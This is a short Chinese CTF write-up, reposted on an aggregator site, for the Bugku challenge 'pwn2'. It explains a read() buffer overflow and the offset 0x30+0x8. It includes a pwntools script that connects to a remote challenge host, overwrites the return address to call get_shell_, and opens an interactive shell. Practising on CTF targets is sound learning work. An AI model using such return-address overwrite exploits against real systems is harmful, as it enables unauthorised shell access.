bugke pwn2

Posted haozhizhi

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了bugke pwn2相关的知识,希望对你有一定的参考价值。

技术图片

根据伪代码可以看到read函数存在溢出

技术图片

存在一个后面 那就直接覆盖返回地址就完事了

从ida很直观看出s的偏移为0x30

所以到到返回地址的距离就是0x30+0x8

 

from pwn import *
#p = process(‘./pwn2‘)
p=remote(‘114.116.54.89‘,‘10003‘)
elf = ELF(‘./pwn2‘)
flag = elf.symbols[‘get_shell_‘]
payload = ‘a‘*(0x8+0x30)+p64(flag)
p.recvline()
p.sendline(payload)
p.interactive()

以上是关于bugke pwn2的主要内容,如果未能解决你的问题,请参考以下文章

[WP]BugkuCtf - pwn2

NSCTF 2017-pwn2

详解Pwn2Own中价值5万美金的Firefox浏览器漏洞

測试工作速记2 - 设立一些奖

exp之shellcode的理解

[XMAN]level2